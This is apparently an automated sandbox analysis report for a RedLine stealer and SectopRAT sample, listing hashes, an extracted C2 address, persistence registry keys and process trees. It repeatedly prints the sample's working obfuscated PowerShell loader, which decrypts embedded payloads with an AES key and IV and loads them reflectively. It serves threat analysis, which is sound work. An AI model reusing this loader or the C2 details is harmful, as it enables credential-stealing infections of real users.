redline | f917e8fa3a39fb758ed2e864115f05bfec876b8be93457999334b50b6addfb6e

Analysis

max time kernel
300s
max time network
302s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
04/05/2024, 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Server.exe
Size

19.1MB
MD5

289551af408b0078fafe6af222c18f59
SHA1

d2f36b64d04f5ca2e6e9e975733eec9efd64041a
SHA256

f917e8fa3a39fb758ed2e864115f05bfec876b8be93457999334b50b6addfb6e
SHA512

fedefedbaa2f3044acbae1c5d5034afdc572487aeaf41e818d984548c70be90bd3d85d9fbc5c900a10a8aa3cb6a1cc44cb81a619b8d397ddc2b4947136b063dc
SSDEEP

393216:TF17m2w3+TFvndGbtzHkxiBa1OMtRkLVqy9MCp7Lw:37m2wOZdGbtoaqOPhlu

Score

10^/10

redline sectoprat fake slinky execution infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Fake Slinky

ii-restored.gl.at.ply.gg:43416

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000600000002aa2b-51.dat	family_redline
behavioral3/memory/4804-61-0x00000000006E0000-0x00000000006FE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000600000002aa2b-51.dat	family_sectoprat
behavioral3/memory/4804-61-0x00000000006E0000-0x00000000006FE000-memory.dmp	family_sectoprat

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3628	powershell.exe
1420	powershell.exe
9180	powershell.exe
5936	powershell.exe
14136	powershell.exe
13164	powershell.exe
10676	powershell.exe
10456	powershell.exe
4652	powershell.exe
5508	powershell.exe
7148	powershell.exe
10804	powershell.exe
1080	powershell.exe
8468	powershell.exe
7136	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1532	slinkyloader.exe
4804	build.exe
3824	slinkyloader.exe
1324	build.exe
4408	slinkyloader.exe
5112	build.exe
3708	slinkyloader.exe
876	build.exe
2512	slinkyloader.exe
1468	build.exe
916	slinkyloader.exe
2800	build.exe
484	slinkyloader.exe
3908	build.exe
3680	slinkyloader.exe
3660	slinkyloader.exe
2912	build.exe
3312	slinkyloader.exe
1052	build.exe
2716	slinkyloader.exe
4784	build.exe
4364	slinkyloader.exe
2604	build.exe
412	slinkyloader.exe
2588	build.exe
3496	slinkyloader.exe
3584	build.exe
1044	slinkyloader.exe
4116	build.exe
2952	slinkyloader.exe
3128	build.exe
1244	slinkyloader.exe
2456	build.exe
1952	slinkyloader.exe
4720	build.exe
1984	slinkyloader.exe
3340	build.exe
4876	slinkyloader.exe
4280	build.exe
3076	slinkyloader.exe
1496	build.exe
4852	slinkyloader.exe
5144	slinkyloader.exe
5224	build.exe
5288	slinkyloader.exe
5416	build.exe
5460	slinkyloader.exe
5620	build.exe
5724	slinkyloader.exe
5816	build.exe
5864	slinkyloader.exe
5976	build.exe
6020	slinkyloader.exe
6120	build.exe
5200	slinkyloader.exe
3900	build.exe
1508	slinkyloader.exe
4560	build.exe
5400	slinkyloader.exe
5636	build.exe
5536	slinkyloader.exe
5572	build.exe
5484	slinkyloader.exe
5284	build.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	Server.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3628	powershell.exe
3628	powershell.exe
1420	powershell.exe
1420	powershell.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
5508	powershell.exe
5508	powershell.exe
5508	powershell.exe
7148	powershell.exe
7148	powershell.exe
7148	powershell.exe
9180	powershell.exe
9180	powershell.exe
9180	powershell.exe
7136	powershell.exe
7136	powershell.exe
7136	powershell.exe
10804	powershell.exe
10804	powershell.exe
10804	powershell.exe
1080	powershell.exe
1080	powershell.exe
1080	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	4804	build.exe
Token: SeDebugPrivilege	1324	build.exe
Token: SeDebugPrivilege	5112	build.exe
Token: SeDebugPrivilege	876	build.exe
Token: SeDebugPrivilege	1468	build.exe
Token: SeDebugPrivilege	2800	build.exe
Token: SeDebugPrivilege	3908	build.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	2912	build.exe
Token: SeDebugPrivilege	1052	build.exe
Token: SeDebugPrivilege	4784	build.exe
Token: SeDebugPrivilege	2604	build.exe
Token: SeDebugPrivilege	2588	build.exe
Token: SeDebugPrivilege	3584	build.exe
Token: SeDebugPrivilege	4116	build.exe
Token: SeDebugPrivilege	3128	build.exe
Token: SeDebugPrivilege	2456	build.exe
Token: SeDebugPrivilege	4720	build.exe
Token: SeDebugPrivilege	3340	build.exe
Token: SeDebugPrivilege	4280	build.exe
Token: SeDebugPrivilege	1496	build.exe
Token: SeDebugPrivilege	5224	build.exe
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeDebugPrivilege	5416	build.exe
Token: SeDebugPrivilege	5620	build.exe
Token: SeDebugPrivilege	5816	build.exe
Token: SeDebugPrivilege	5976	build.exe
Token: SeDebugPrivilege	6120	build.exe
Token: SeDebugPrivilege	3900	build.exe
Token: SeDebugPrivilege	4560	build.exe
Token: SeDebugPrivilege	5636	build.exe
Token: SeDebugPrivilege	5572	build.exe
Token: SeDebugPrivilege	5284	build.exe
Token: SeDebugPrivilege	4428	build.exe
Token: SeDebugPrivilege	4024	build.exe
Token: SeDebugPrivilege	6036	build.exe
Token: SeDebugPrivilege	712	build.exe
Token: SeDebugPrivilege	6240	build.exe
Token: SeDebugPrivilege	6376	build.exe
Token: SeDebugPrivilege	6516	build.exe
Token: SeDebugPrivilege	6656	build.exe
Token: SeDebugPrivilege	6796	build.exe
Token: SeDebugPrivilege	6940	build.exe
Token: SeDebugPrivilege	7080	build.exe
Token: SeDebugPrivilege	5484	build.exe
Token: SeDebugPrivilege	6196	build.exe
Token: SeDebugPrivilege	6712	build.exe
Token: SeDebugPrivilege	5880	build.exe
Token: SeDebugPrivilege	5696	build.exe
Token: SeDebugPrivilege	7148	powershell.exe
Token: SeDebugPrivilege	6288	build.exe
Token: SeDebugPrivilege	6932	build.exe
Token: SeDebugPrivilege	7288	build.exe
Token: SeDebugPrivilege	7428	build.exe
Token: SeDebugPrivilege	7576	build.exe
Token: SeDebugPrivilege	7720	build.exe
Token: SeDebugPrivilege	7860	build.exe
Token: SeDebugPrivilege	8004	build.exe
Token: SeDebugPrivilege	8136	build.exe
Token: SeDebugPrivilege	7060	build.exe
Token: SeDebugPrivilege	500	build.exe
Token: SeDebugPrivilege	7684	build.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4140 wrote to memory of 1216	4140	Server.exe	80
PID 4140 wrote to memory of 1216	4140	Server.exe	80
PID 1216 wrote to memory of 3628	1216	cmd.exe	83
PID 1216 wrote to memory of 3628	1216	cmd.exe	83
PID 3628 wrote to memory of 4548	3628	powershell.exe	85
PID 3628 wrote to memory of 4548	3628	powershell.exe	85
PID 4548 wrote to memory of 2820	4548	Server.exe	86
PID 4548 wrote to memory of 2820	4548	Server.exe	86
PID 3628 wrote to memory of 1532	3628	powershell.exe	88
PID 3628 wrote to memory of 1532	3628	powershell.exe	88
PID 2820 wrote to memory of 1420	2820	cmd.exe	92
PID 2820 wrote to memory of 1420	2820	cmd.exe	92
PID 1532 wrote to memory of 4804	1532	slinkyloader.exe	93
PID 1532 wrote to memory of 4804	1532	slinkyloader.exe	93
PID 1532 wrote to memory of 4804	1532	slinkyloader.exe	93
PID 1532 wrote to memory of 3824	1532	slinkyloader.exe	95
PID 1532 wrote to memory of 3824	1532	slinkyloader.exe	95
PID 3824 wrote to memory of 1324	3824	slinkyloader.exe	96
PID 3824 wrote to memory of 1324	3824	slinkyloader.exe	96
PID 3824 wrote to memory of 1324	3824	slinkyloader.exe	96
PID 3824 wrote to memory of 4408	3824	slinkyloader.exe	98
PID 3824 wrote to memory of 4408	3824	slinkyloader.exe	98
PID 4408 wrote to memory of 5112	4408	slinkyloader.exe	99
PID 4408 wrote to memory of 5112	4408	slinkyloader.exe	99
PID 4408 wrote to memory of 5112	4408	slinkyloader.exe	99
PID 4408 wrote to memory of 3708	4408	slinkyloader.exe	101
PID 4408 wrote to memory of 3708	4408	slinkyloader.exe	101
PID 3708 wrote to memory of 876	3708	slinkyloader.exe	102
PID 3708 wrote to memory of 876	3708	slinkyloader.exe	102
PID 3708 wrote to memory of 876	3708	slinkyloader.exe	102
PID 3708 wrote to memory of 2512	3708	slinkyloader.exe	104
PID 3708 wrote to memory of 2512	3708	slinkyloader.exe	104
PID 2512 wrote to memory of 1468	2512	slinkyloader.exe	105
PID 2512 wrote to memory of 1468	2512	slinkyloader.exe	105
PID 2512 wrote to memory of 1468	2512	slinkyloader.exe	105
PID 2512 wrote to memory of 916	2512	slinkyloader.exe	107
PID 2512 wrote to memory of 916	2512	slinkyloader.exe	107
PID 916 wrote to memory of 2800	916	slinkyloader.exe	108
PID 916 wrote to memory of 2800	916	slinkyloader.exe	108
PID 916 wrote to memory of 2800	916	slinkyloader.exe	108
PID 916 wrote to memory of 484	916	slinkyloader.exe	110
PID 916 wrote to memory of 484	916	slinkyloader.exe	110
PID 484 wrote to memory of 3908	484	slinkyloader.exe	111
PID 484 wrote to memory of 3908	484	slinkyloader.exe	111
PID 484 wrote to memory of 3908	484	slinkyloader.exe	111
PID 484 wrote to memory of 3680	484	slinkyloader.exe	113
PID 484 wrote to memory of 3680	484	slinkyloader.exe	113
PID 1420 wrote to memory of 3064	1420	powershell.exe	114
PID 1420 wrote to memory of 3064	1420	powershell.exe	114
PID 3064 wrote to memory of 2228	3064	Server.exe	115
PID 3064 wrote to memory of 2228	3064	Server.exe	115
PID 1420 wrote to memory of 3660	1420	powershell.exe	117
PID 1420 wrote to memory of 3660	1420	powershell.exe	117
PID 2228 wrote to memory of 4652	2228	cmd.exe	120
PID 2228 wrote to memory of 4652	2228	cmd.exe	120
PID 3680 wrote to memory of 2912	3680	slinkyloader.exe	121
PID 3680 wrote to memory of 2912	3680	slinkyloader.exe	121
PID 3680 wrote to memory of 2912	3680	slinkyloader.exe	121
PID 3680 wrote to memory of 3312	3680	slinkyloader.exe	146
PID 3680 wrote to memory of 3312	3680	slinkyloader.exe	146
PID 3660 wrote to memory of 1052	3660	slinkyloader.exe	124
PID 3660 wrote to memory of 1052	3660	slinkyloader.exe	124
PID 3660 wrote to memory of 1052	3660	slinkyloader.exe	124
PID 3660 wrote to memory of 2716	3660	slinkyloader.exe	126

C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4140
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "Server.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3628
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4548
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2820
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:3064
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Adds Run key to start application
        
        PID:2612
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        11⤵
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        Adds Run key to start application
        
        PID:5348
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        14⤵
        
        PID:6672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        Adds Run key to start application
        
        PID:8552
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        17⤵
        
        PID:8596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function 